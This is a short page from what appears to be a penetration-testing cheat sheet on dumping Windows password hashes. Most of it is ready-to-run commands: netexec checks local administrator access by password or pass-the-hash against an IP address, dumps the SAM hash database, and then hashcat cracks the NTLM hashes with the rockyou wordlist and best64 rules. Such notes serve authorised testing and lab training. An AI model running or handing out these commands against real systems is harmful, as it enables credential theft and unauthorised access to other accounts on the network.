Dumping HASH

If we have username of user and password or hash of the system with local administrator rights (Pwded) We can dump all other user hashes.

# Example:
# Check if you have local administrator access.
netexec smb 192.168.117.212 -u $UserName -H $NTLMhash
netexec smb 192.168.117.212 -u $UserName -p $Password

# if you got message as pwded then get sam file data.
netexec smb 192.168.117.212 $UserName -H $NTLMhash  --sam --local-auth
netexec smb 192.168.117.212 -u $UserName -p $Password  --sam --local-auth

Save the All hashes in a file with username (manually) 😥

# Then you can try cracking it. If you get password then save it. Otherwise move on.
hashcat -m 1000 --username all.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

hashcat -m 1000 --username all.hash --show

PreviousNetExec Tool NextChecking Credential

Last updated 1 year ago